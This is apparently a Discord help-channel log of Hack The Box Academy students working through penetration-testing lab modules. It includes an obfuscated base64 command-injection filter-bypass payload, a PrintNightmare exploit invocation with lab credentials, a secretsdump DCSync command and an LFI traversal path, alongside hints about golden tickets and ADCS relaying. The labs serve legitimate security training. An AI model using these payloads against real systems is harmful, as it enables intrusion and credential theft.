Thanks, the Fatty box wasn't the one i needed but rather the PivotAPI box, i saw it mentioned by someone else in the discord together with the fatty box after doing a CTRL+F
oh you're doing the first part, my bad, you'll need fatty for the section after, good luck 
module: LINUX PRIVILEGE ESCALATION, Escaping Restricted Shells. I solved this one by adding something to the ssh command. was there another way since this solution was not found in the theory above the question
Hey need some help with "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download." in the Wordpress section, i have a reverse shell and can't find this flag
find /path/to/search -type f -name "*.sh" -exec grep -E 'HTB\{.*\}' {} \; try this string, maybe remove the *.sh and then you can see which file contains the flag..
no luck, I also tried grep -rn "HTB{" / 2>/dev/null but only found the other two flags
you can always redirect the content of the flag.txt to the echo command: echo "$(cat flag.txt)"
‘use a vulnerable plugin’
found it thanks all 🙂
Is this a question whose answer you have to look up (which I already did and found it to be the correct answer... I both found it in the module and googled it) or do you have to use the tools mentioned in the module to find the password length? I used one of the tools... and even though it gave me a minimum password length it was the incorrect one.
"https://academy.hackthebox.com/module/143/section/1490"
"What is the default Minimum password length when a new domain is created? (One number) "
look at the question after that and you'll know why it's wrong
But this doesnt get you to breakout from the restricted shell.
you’re right, it doesn’t
please implement 0 star ratings for server side attacks module
I tried something entirely out of scope in the module to get a shell.
hi im having issues with the bleeding edge module, im trying to use metasploit but it just doesn't do anything and i've been stuck on this for a while. the module does not say which boxes certain commands go into, can someone assist me with this?
I am doing the 'Attacking Common Services' module and things seem to be messed up on the target server. I have found a valid login for FTP, but the flag within the home dir and the login itself appear to be answers to the SMB portion of the module? And there appears to be no correct answers to the FTP portion?
Anyone else experienced this?
Also, the SMB section states to login via SSH to retrieve the flag, but I am unable to do so with these creds. Instead, I can login via FTP and get the flag there. Very bizarre
I used the command where I specify 'minPwdLength' and when I entered the result it returned, that was the correct one. I am not sure how that is related to the first question
the first question asked for the default min pass length for a new domain, the second asked for the default pass length for the inlanefreight domain, which has changed the default length
Hey everyone! New guys here. I just completed my first attack in the Public Exploits module using a wordpress exploit to get a file read of the /flag.txt
However, I only reached the flag by just guessing that I should look for a /flag.txt file path. Is there a way to enumerate through the directories that I'm just not remembering? gobuster didn't seem to offer any web directories
Okay. So for the first question would that have been something I only have to look up(which I did) or is it a question I could have ALSO found with any of the following commands mentioned in the module
if the domain has changed the password policy, then the tools' output wouldn't be the same as the default of a new domain
where is the general channel??
so yes need to look it up
give more info, what have you tried, any errors, etc
...
i sent you a dm with an image
ty
send it here, and just a single image doesn't help to troubleshoot
what module and section is this?
It's the getting started module from the penetration tester path, the Public Exploits section
it's an LFI, and the path to the flag is given in the question, later modules will introduce what potentially interesting files you can find using that, e.g. /../../../../../../etc/passwd
Thanks for the quick reply! I should have read the question more carefully, wouldn't have spent so much time jamming in random file paths lol. Can you quickly just explain what an LFI is? Sorry nooby question
make sure you set the ip and port right, should be the ip of your attack machine, other than that just follow what's in the section
which machine, the attack01 or the base one you start it from
local file inclusion is just a vulnerability that lets you read a file on the system when you're not supposed to
the one you ssh into
oh ok
can someone maybe give me some advice as to what may need to change in this command? I just can't seem to figure out what to change with this one... I am working on the command injection assessment... this is what I put into the site after the t= from just selecting a file, but not clicking on the move option yet... from this i do get the malicious request denied response. Trying to figure out why this won't work and get me the flag.. unless i need to actually perform the action of hitting the move button and then input the command I have below, but not sure where to input it at here: ||index.php?to=&from=51459716.txt&finish=1&move=1 ||
||cat ${PATH:0:1}flag.txt ${PATH:0:1}var${PATH:0:1}www${PATH:0:1}html${PATH:0:1}files${PATH:0:1}tmp
%7c%7cbash<<<$(base64%09-d<<<Y2F0ICR7UEFUSDowOjF9ZmxhZy50eHQgJHtQQVRIOjA6MX12YXIke1BBVEg6MDoxfXd3dyR7UEFUSDowOjF9aHRtbCR7UEFUSDowOjF9ZmlsZXMke1BBVEg6MDoxfXRtcA==)||
Can someone DM me maybe so i don't give too much away? or you can just give me a hint here if you want.
im still having trouble im going to restart everything and try again
so first thing is ssh into the attack01 box?
yes that will give you access to the internal network
ok and then?
i keep getting stuck and need to know what im supposed to do following their list is getting me stuck
it’s really not this complicated
@lusty thicket i seem to have overcomplicated it then lol
got it
you were right lol...way overcomplicated it - even the command
just follow the steps, you need to have smb server serving the msfvenom dll, have the handler running on the same ip, and finally run the CVE-2021-1675.py
all of them need to be done within the machine you ssh into, open 3 terminals for it
awesome!
thanks for the hint lol
i get this error
read the error
CVE-2021-1675.py will throw an error if I remember right, you just need to get a shell
its almost working, i got a tcp handler but when using the command in the pic it just fails
its not sending the stage so i can't get a shell
the smbserver should receive a connection, make sure the dll is in the directory
check PivotAPi box walkthroughs
it is in the directory
your command to generate the payload?
yes both cve 2021-16775 and backupscript are in the home folder
send your command to generate the payload here
and did you set the payload type in msf
sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'
sudo smbserver.py -smb2support CompData /backupscript.dll
it authenticates successfully but does not send the stage in msf console
none of those are the msfvenom commands
smbserver should point to a directory, not a file
ok so it didnt work i had to reset and everything
are you able to help me?
Anyone familiar with Footprinting Lab - Medium? I see that there are SMB and NFS ports open, smbclient is not working for smb and when I when I mount the NFS server I get access denied and can't open it
navigate with su
I am working on LLMNR/NBT-NS Poisoning - from Windows and I cant seem to RDP into the windows box. I have tried xfreerdp and remmina. I have also restarted the box. I am getting an error that says Certificate verification failure 'self-signed certificate and time out. I am using TCP vpn
has anyone else been having trouble or had this issue in the past?
What am I navigating with su? I was able to see what is in the mounted folder, I don't think this is what I need so am I using su on the smbclient?
‘when I when I mount the NFS server I get access denied and can't open it’
can anyone help me with what im doing wrong in the bleeding edge chapter of ad enumeration and attacks?
idk what else to tell you other than to just follow the module, you also didn't send the msfvenom command when I asked a few times
Maybe the /tls-seclevel:0 parameter in xfreerdp?
Ssc will always fail
because your attack system isn't in the CA store that's signing the certs
That's generally a non-issue for labs
If you're referring to a "black screen" when it connects: hit enter
Troubleshooting the easy things first. Making sure it's not on my end
was putting in compdata backupscript.dll when i was supposed to just put compdata . for the server
thank you it worked
I did say that smbserver needs to point to a dir, . is just a shorthand for current directory
I have done all of the troubleshooting I can think of and keep having the same issue
running nmap now to see if there was a different port than the usual but I doubt it
Try wrapping the password and username in single quotes
did that already and no dice but I will try again
same
the nmap scan confirmed default port but it took a long time. These boxes have been really slow and laggy for me
Try switching vpn servers
I got into the share folder on the NFS server but can't figure out how to open the 1 file that appears to have data in it, any thoughts?
Cat it or cp it to your machine, chown to your user and open it?
¯\_(ツ)_/¯
It's one of the few times I will say, navigate as root
Are you using the right filename? :p
Was typing the path wrong
Of course it was the easier solution. Thanks.
I've run into that issue a bit
what module was it again? just curious
Yes just entering the path wrong
LLMNR/NBT-NS Poisoning - from Windows
If you're suspecting connection stuff do this: ping <target_ip> -O -l 3 -c 5 if you see any that are way higher than others or even inconsistency: change vpn region
Inveigh.exe is better than invoke-inveigh iirc more interactive
that's what I used, I really liked that you could esc and run commands on it while it's running
easy lesson just had the stupid rdp/vpn issue lol. 5 min task otherwise
Yeah that way you can properly stop it once you're sure it's grabbed the info you want
One question, in the module ---> BROKEN AUTHENTICATION, section ---> Brute Force Cookies, question ---> Modify the application session cookie in the /question1/ subdirectory to give yourself access as superuser. What is the flag?, in the cookie, which also takes the current time of the server?
Since I have this but I don't get the cookie
Is there a good resource out there to learn how to use SQL Server Management Studio? I'm trying to figure this out but I do not know SQL at all
Footprinting/SNMP
i used to get the flag just by scanning, but the question says that i need to find the custom script, run it and get the flag output, which i also found, but how im gonna run that script?
By using enum tools you can get the output of the custom script
but does the enum tool 'run' that script?
i just used snmpwalk, so the flag that i see is the output from the /usr/share/flag.sh already?
k i was just wondering why i found the flag without interacting with the script
Because you don't need to run the script
It's already run
You're basically retrieving the log
oh okay
Hi @misty current , following up on Injection Attacks Skills Assessment. I can read files with ||XMLHttpRequest and file:///||, I know which url I want to get, but the same technique with ||XMLHttpRequest and http://|| doesn't work. (Using ||iframe|| works but the result is not complete and not clearly visible.)
Can we DM ?
anyone on HTB repeating requests, module using web proxies. i got the first flag, but this "use the burp repeater to find the next flag" isn't working, tried grep through all directories and folders to find HTB or a file named flag elsewhere but coming up empty handed
im looking through all the directories but can't find this second flag file
what did the question say
Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.
inject using the find cmd
i tried that a couple of times but just can't get it to work properly
i've also done grep for HTB
I have been stuck on the Command Injections Assessment for hours. I went through everything else really quickly. I know it is something simple I am missing. The Hint is not helping me because I cannot get anything at the end to work. Has anyone else had this issue?
check the ||root|| dir for the flag😉
what issue? 
thank you that worked!!!!
😉
By issue, I meant the hint not actually helping, lol. I know I cannot move or copy the flag.txt file in File Manager box, but I cannot even read it because I am getting told that I cannot mv it. I am just stuck.
using the methods taught in the section
I thought that I did. That is how I was able to get to the point where it says permission denied, but I am not even trying to move it just read it. Man, what a drag.
i think you’re actually supposed to inject an actual payload for that
I have tried a whole bunch of them, but they are wrong. I feel like I am almost there. I at least can see that the flag exists somewhere, but I cannot even get the location of it.
I am just having issues figuring out where I should put the payload. The Hint says at the end, and nothing I put at the end works. The middle kind of works, but I am still getting errors.
it’s very simple payload and not that complicated
Man, that makes me feel even more foolish.
my injection point was something like ||.txt;|| idk if that helps
I will try a few more things then. Thank you. If nothing works, do you think that you can take a look at my payload, please, and maybe point me in the right direction?
of course
Thank you.
the service itself has a functionality that is being marked as malicious
i think that is a hint
when you get ‘malicious request denied’ there it is
Thank you. I did get that part. I have been messing with Burp and Repeater for like two hours now. I did not first check to see what the site could do. That is my fault. I hope to never make that mistake again.
??? now I want to throw my keyboard if I have been wasting my time, lol.
first try to figure out why the request is being marked as malicious
if its a legit request
nah, burp is a “browser”
just that you don’t need that here
That I saw right away it was the / that was not there but being interpreted.
its there but url encoded
when it reaches the server it is decoded and ofc is part of a blacklist
I am seeing it in the Inspector now but not encoded. In Burp, I was able to use the proper way to use the bad character. Looking at the Hint, nothing I had put in at the end worked.
Correction, resending did not work I had to open the browser again and I see that the error is gone.
i dont know what you are talking about
when you try to move from /tmp to X it gets malicious request denied
because the / from /tmp
I meant to edit that prior message not delete what I had said. I was saying that nothing was updating and I said correction it was basically my fault because I did not open a new page
but do you know how to continue?
I thought I did. The URL stuff is throwing me off a bit. I do have a page after editing that error. Maybe I am not supposed to edit the error. I did try an || but that did not help it bypass the malicious error
first of all if the /tmp part is triggering the deny remove it
and if the command is smth like ‘mv X Y’ try to figure out where to inject
it could be ‘mv X; <evil cmd here>; Y’
among others possibilities
with a bind shell, why is it important when writing what is essentially a socket server on python, to listen on the IP 0.0.0.0?
#module: INJECTION ATTACKS
#section: XPath - Blind Exploitation
#describe: I need help to fix the script to extract the flag
https://academy.hackthebox.com/module/204/section/2226
it’s a wildcard ip
and accepts connections from any interface
I went through and redid everything that I could remember from Burp directly in the browser and I am back at Permission Denied.
Hi, guys!
I'm new in HTB and I want to know if I could do all the career path of pentester free or just with a monthly subscription (asking cuz I saw that the modules costs boxes)
the path isn't gonna be free; as it contains tier 1 and 2 modules
hmm, I think it would be useful to rewrite that clarification to the module "getting started", the wording is a bit poor as of now
tier 0 modules are the only ones that give you back their cost; after that the modules only give back 20% their cost
you only start with 40? cubes i think
1 month plat and 1 month gold should be enough to unlock them
Yo, I am at the hard-lab, I am aboutta get the ||vhd|| file, the problem is that the smb always disconnects and doesn't download it all, hence I can't use ||bitlocker2john|| in order to get the hashes.
Any ideas on what to do?
Password Attacks
Skill Assessement
Hard Lab
Oh ok! tysm 🙂
try a different file transfer method, there's a few different ways
Will do that.
since you're likely using xfreerdp, one of the goated xfreerdp options is mounting a share
by doing /drive:name,/path/to/share/dir/
wdym takes so much time?
don't DM without asking @analog path
you didn't give context to you having a student email, so didn't recommend student sub
that's the best value
if you're referring to latency stuff: use the TCP vpn download
¯\_(ツ)_/¯
Ok, I will take it then 🙂 ty
Yeah, I am using udp , rn.
TCP is better
Hi guys, did anyone manage to finish skill assessment 2 of the Introduction to Deserialization module? I'm stuck on the second flag
im on Password Spraying - Making a Target User List in the AD section. I ran the tool and I have the results here. I blacked it out to avoid spoilers. Issue is the task is not accepting the answer
AD skills assessment starting to piss me off now, I literally rdp'd 20 min ago with a user, but now the connection keeps failing 🥲
ran it again got a new answer and it worked
happened to me as well
I have been on this Command Injections for way too long. I cannot get the gosh darn flag. I am right back where I was hours ago because my notes were not very good
If you are still available, can you please take a look at my injection to see if maybe I have something mistyped, please?
of course
Thank you. Would it be best to DM?
yes
hey guys, i was using my metasploit console through my kali to solve the msf module. when i run an exploit it says exploit done but connection failed. i have tried everything, it's failing to connect but it does work in the Pwnbox. what are the possible mistakes in my kali
Can anyone explain CPE credits to me that are given with htb academy, google has a lot of varying explanations.
CPEs are Continued Professional Education credits; you sign up with your ISC2 number and any progress you make on academy/on main site is counted as credits towards maintaining a cert - as some certs DO require you to either
- renew them every x years
- have your job sign off as the job provides the CPEs
- get enough CPE per x time frame to not need to retake cert exam
... anyone ?
any idea how to access i tried using sqlcmd too
Module: Active Directory Enumeration & Attacks
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux
Task: Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
I created a golden ticket and added to the KRB5CCNAME environment variable like shown in the lesson.
But when i try to dump the NTDS hashes using secretsdump with the following command:
secretsdump.py LOGISTICS.INLANEFREIGHT.LOCAL\hacker@172.16.5.5 -k -no-pass -just-dc -outputfile abc
It does not work, no file was created. Is there something wrong with the command ?
wait how to fix it ?
I was just asking for clarification as in: you had the same variables set ¯\_(ツ)_/¯
i can't get the libnmap python module installed, im getting errors, need it so i can use odat
any errors? and it should be a forward slash in the secretsdump command
There is no error, it just displays: [*] Cleaning up ... Even with forward slash
if you have dependency problems, you may consider using the docker version
pipx install python-libnmap
don't set an output file and use --debug
The ticket looks expired
the year is 2033
yep and make sure your golden ticket is forged correctly
i'll need to run to full rockyou.txt?
I can't read lol
Make sure there isn't a provided wordlist first
i'll reset the machine and try again
we used the rockyou-10 a lot on this module
you need to use lookupsid to get the domains sid btw, don't copy those in the module, and make sure lookupsid targets DC
yes i did
do the steps again, make sure the sids and hash are correct
They've been known to do that sometimes
Rude of them
screw the oracle footprint, even on pwnbox its running partially, mid process it errors, ima just google the god damn flag xD
don't LOL
for the most part it's fairly copy/paste from the section
okay tomorrow ill continue then
footprinting is long as fuck, take a break or do other modules to take a break
is what i'm doing 
It worked now. I just removed the child domain name and replaced the dc ip by its hostname (secretsdump.py h4ck3r@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-user bross). Thanks for the help
yh there seem to be a problem
Module: Web Attacks. Section: Bypassing Encoded References.
"Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly."
I'm hard stuck on the question above for two days now, I assume that the script provided for mass enumeration needs to be modified. I tried to modify it in numerous ways but don't know what I'm doing wrong. Can I DM someone please?
WEB ATTACKS
Bypassing Encoded References
Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly.
I found the request with a hash in the image attached. I don't know if it's the right request to begin with. But even if it is, I can't unhash the hash parameter and there is a bunch of stuff at the bottom that I don't understand. I also can't find the function that creates the hash in the source code. Any help would be appreciated.
That request is almost definitely unrelated - chrome sends a request to sb-ssl.google.com to check whether the file you're downloading is known to be malicious

Quick question, why do we need to switch to root? I struggled with it as well.looking to clear this concept
it's because if you don't mount it with like -o nolock,no_root_squash or something like that it puts it as the user/group nobody which means you have to navigate it as root
Ok very clear now
Thanks a lot…I was struggling to understand this reasoning
And was very hesitant to ask, as I keep having terrible imposter syndrome and thought I’ll look silly asking basic questions here to all of you
Can I use NordVPN on Starting Point?
??? HTB provides a tunnel vpn to use: (you're required to use it) idk if it works with nord.
you're not the dumbest person in the room if you ask questions
Okay, that is true.
Thanks
also there's almost no reason to use a vpn provider these days
https://help.hackthebox.com/en/articles/6007919-introduction-to-starting-point also for help with starting point machines you'll need to link your account following instructions in #welcome and you'll have access to #starting-point
Let's get started with Starting Point.
This is the only other request being made and the hash MQ%3D%3D just means MQ== which makes no sense, shouldn't it be a UID because the function is:
function downloadContract(uid) {
window.location = `/download.php?contract=${encodeURIComponent(btoa(uid))}`;
}
Any help would be appreciated
Try base64 decoding MQ==
Thanks I got it.
I'm trying to understand how this exercise is relevant? When will you need to look for the same type of file for different users exactly?
When do you have to enumerate things ? Almost all the time. Maybe you can access things you shouldn't ?
It's called IDOR and it's a pretty common thing
But what exactly is a user file that you shouldn't access?
Can u give me one relevant example
Because I don't want to learn how to get "flags" I want to learn real world hacking
Well ACL on any kind of resource is very common isn't it ? You can't access other people files on any file sharing/cloud shiet
that's basically a core feature of any platform on the internet
so yeah, if it's broken, meh, problem
I don't know the exact exercise you're working on tho, but it looks like basic enum ^^
Actually this module made me rage quit for a while
But now that I am making progress on it I realize that yes it's just basic enumeration
You tried to inject anything in this input ?
I didn't because that's not the goal of this exercise
SocksOverRDP module is not working
I was able to initiate the dll, but when I go to connect to the 172 ip with the jason username it does not want to connect
a --> b --> c
These are my settings
did you connect to the middle host?
Yeah, I used xfreerdp to get to the supplied 10.129.... htb-student host
Was able to transfer the binaries
that's not the middle host, read the section carefully
Got the dll to do its thing
iirc there's 3 hosts, target, second, final
That's what I'm stuck on, connecting to the middle host
your screenshot shows otherwise

I did get this message
The screenshot is just the part of the module I'm working on
I'm aware - i've done that module
Just wanted to make sure there's nothing I'm missing before I restart and try again.
so you've started the socksoverrdp server on 172.16.5.19?
The only settings I input into the remote desktop connection are ip and username. Is there anything else I need to configure
172.16.6.155 isn't accessible by the jump host you start with
that's why i stated a --> b --> c
a & b are on the same subnet, b & c are on the same subnet, but a & c need a bridge to get to
a is the initial host, c is the final host, b is victor

So what am I supposed to do here
read the instructions? 
So the question at the end of the lesson is asking me to use jason.
you have socksoverrdp enabled: remote into that 172.16.5.19 machine first and transfer socksoverrdp server
yes: because that's the creds for the last step in the chain
Oh, got it.
you can also select the local resources tab to mount a folder to the rdp session
iirc
I was thinking linearly and thought victor was just for the example, but jason was for the actual question portion
Makes sense now.
if you notice: this whole module has been guided instruction
not much to stray from
Well thank you for the clarification!
I appreciate it!
I was assuming I had connection issues because the xfreerdp session kept dropping earlier.
i think a lot of academy is suffering rn; If you're already using the TCP vpn, chalk it up to servers being dumb atm - otherwise: switch to the TCP ovpn download
You are probably right. Doesn't work with victor
try restarting the lab then
i remember this one being a tad bit touchy
Yeah, I figured, thanks again!
the windows labs sometimes are just sad :( give it like 3-5 minutes after spawning
the skill assessment is really fun though tbh, as it's not just focused on pivoting; it utilizes a bunch of recon/enum techniques and starts you off with upgrading the webshell they give you
Hey, I keep getting an issue when rdp'ing into a practise box at the end of a section for some reason. Error: [03:18:12:890] [3509:3510] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
this means that the username/password is incorrect
try wrapping the password in single quotes
Alright i'll give that a try thanks
/p:'pa$$w0rd'
I haven't wrapped it before which is strange, and it's worked in history
depends on the password generally
Ahh true if it contains unicode characters and stuff
if the password has $$ or $<anything> then bash will try and interpret it as calling a variable
single quotes tell bash "no, this is literally a string"
i had a feeling i knew it was a complex p@$$sword 😉
(you're not the first, and probably not the last that's had that issue)
also !! or !<N> is a history command
!! runs the last command and !<N> runs the Nth command in history
That's cool I didn't know that
export test=lol
echo $test
export test=lol2
!-3
!-3
to be more specific it repeats the nth line in the command history: so if you had a bunch of stuff that's piped to other commands and don't wanna copy/paste and just run it as is. so it'll respect
echo $test | rev | wc -c | md5sum something like that
right okay, so it considers the entire line not just a single command
yes because it's akin to just using the arrow keys to go to previous command
yep
you can use history to see what your command history is if you're curious
Also bit of a silly question for Password Attacks module, section 14 (PassTheTicket), the question "Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?", my RDP session is really slow and takes ages to scroll for me to count them all, so I want to at least ensure i'm counting the right thing. Is it asking us for the total amount of tickets exposed? Or is there something that says how many? I'm using mimikatz btw
iirc each ticket is on its own line > so you can just do wordcount -l on the Tickets file
i can't recall if there's a way in mimikatz, likely there is
i just remember it being trivial
I thought of using wc but forgot I'm in a windows cmd
alternatively just transfer the file to your linux attack host
you should be trying every opportunity to practice data exfiltration ¯\_(ツ)_/¯
True true
oop it was asking for the amount of users that had tickets exposed, not the amount of exposed tickets
Got it in the end

can someone give me an idea as to why this won't parse? sudo cat web_discovery.txt | aquatone -nmap
aquatone v1.7.0 started at 2023-12-29T04:19:20Z
Unable to parse input as Nmap/Masscan XML: EOF
start with sudo
sudo openvpn /path/to/openvpn.ovpn
Error opening configuration file
Learn how to connect to the VPN and access Boxes on HTB Labs.
/path/to is a placeholder
you'll want to make sure that either you're running openvpn from the directory you downloaded the vpn connection to, or know what directory it's in
for example /home/username/Downloads/starting-point.ovpn
I downloaded it and after that I use the Cmd .sudo open VPN {.....}
But getting error in opening file
It's in download directory
then cd to that directory and run it
sudo openvpn starting-point.ovpn or whatever it's named
Yeah after that only its showing the errors
showing the errors
Got it bro tnx
that's very descriptive
I put braces

no
in most contexts when you're seeing braces like [] or {} for a command they are placeholders or to indicate that certain flags or things can be used
learn for yourself; if you're doing academy I suggest doing the Information Security Fundamentals path
if not: Google is free
I'll help if you get stuck in an academy module and you post the question here: but i won't help if you randomly dm me
Ok
Stuck on Linux Privilege Escalation: Logrotate
How to locate the location of the correct .log file?
Is it there in /var/lib??
I searched but found nothing useful
😣
Use the basics of searching in Linux and you will find what you need
Yes in the /var/
I tried ls . log | grep ".log"
Found some but it doesn't seem to work
Just need a little nudge about the location or how to locate the correct .log file
Hi everyone, currently working on module: Injection Attacks, Section: Skills Assessment. I'm kinda stuck here, any hints or help? thanks in advance
Keep trying
Hi all,
Just seeing if anyone was able to provide a nudge on 'ADCS Attacks' ESC 11, question 2 (getting the NT hash of the local admin).
Have been able to successfully get into the filesystem and get the flag. Tried the local tooling (C:\tools) on the filesystem to get the NT hash but been getting errors thrown at me.
Didn't have much luck with certipy and trying to coerce authentication onto WS01 itself, though good chance I may be missing a few arguments/settings needed.
Very much enjoying the module, learning a lot.
certipy relay targeting DC RPC, coercer/petitpotam DC to the listener, get pfx and auth to get ccache, dcsync
I have a question out of curiosity, nothing to do with a particular module question.
Say you have a port forward from the AD environment to your attack box via ligolo or any other technique, but let's say ligolo, as it is so efficient. Is it possible to use responder remotely? I figure this should be feasible, I just don't fully know how. What interface would I have to be listening on, the ligolo one or lo or another? I'm not sure
because say if I connect to the network via vpn then of course I now have new interface from the VPN, but what about over port forward
Thanks. Can I confirm if it's still a dcsync to the DC, given that the question is asking for the local admin? Tried the nt hashes listed (when dcsync to the DC) and didn't have any luck with those submissions.
the AD CS server is on DC, so you need to target DC. the question asked for local admin hash on ws01, use DA's creds to dump reg of ws01 and get the hash
You can't run Responder remotely, you need to be on the same network which you won't be since you're talking about pivoting, you can use Inveigh directly though on whatever Windows machine you compromise
actually responder through a pivot is possible, but can't use ligolo for it, you'll need to port forward with chisel or ssh, open smb ports if you want smb traffic, http ports if you want http traffic etc
though it's more applicable if you're relaying since running responder alone wouldn't do much compared to just running it on an internal host
https://blog.spookysec.net//remote-ntlm-relaying/
So not suitable for the generic capture hashes thing?
"backdooring keepass for fun and profit" holy s*** what blog is this 
thanks for the resource
fun stuff here I am sure
yea sorry about this. Lets get back to focusing. Thanks you guys!
you can but it's just running responder with extra steps, if you're just trying to capture hashes it's much simpler to transfer responder to an internal host and run it there
If you've got the privileges, sure, but what about the issue of running Responder through a VPN?
if the vpn connects to the internal network then just listen on that interface?
either way I think you need sufficient privs to listen or forward port 80/139/445 etc
I think that becomes a bit different once you leave a lab environment, I've heard it so many times, VPN = no responder, could be wrong though
that's more got to do with how the network is configured I believe
Change your approach. The way PDF generates I don't think it'll be able to show you response from http protocol properly. I get it you're having problem with the view and stuff, but that's intentional. ||you are able to reach the internal application, what other technique from the module can you use? That's what you need to figure out now||
you’ll figure it out
Happy Holiday everyone, I got stuck in "Attacking Enterprise Networks" module in "Lateral Movement" section
I tried to use "DomainPasswordSpray.ps1" for password spraying but I got an error message:
Invoke-DomainPasswordSpray : The term 'Invoke-DomainPasswordSpray' is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the
path is correct and try again.
At line:1 char:1
- Invoke-DomainPasswordSpray -Password Welcome1
-
+ CategoryInfo : ObjectNotFound: (Invoke-DomainPasswordSpray:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException
anyone have an Idea what I missed?
Probably need to import power view
Question regarding Linux Privilege Escalation / Special Permissions: There are exactly 2 files you find on the box that are not in the section listing, and just one of them has the setgid bit set, but this file is not accepted as the correct answer to the 2nd question. What's wrong?
Ok, solved: the requested file is listed in the section output, so the question is wrong
because you are supposed to supply it an xml file, it looks like that's a plain txt file
Did you import the DomainpasswordSpray ps1 script?
You probably didn't Import-Module .\DomainPasswordSpray.ps1
the question asked for "Find a file with the setgid bit set", the answer is not shown in the output to find sgid files in that section
Oh I remember this - You need to edit the script, read the error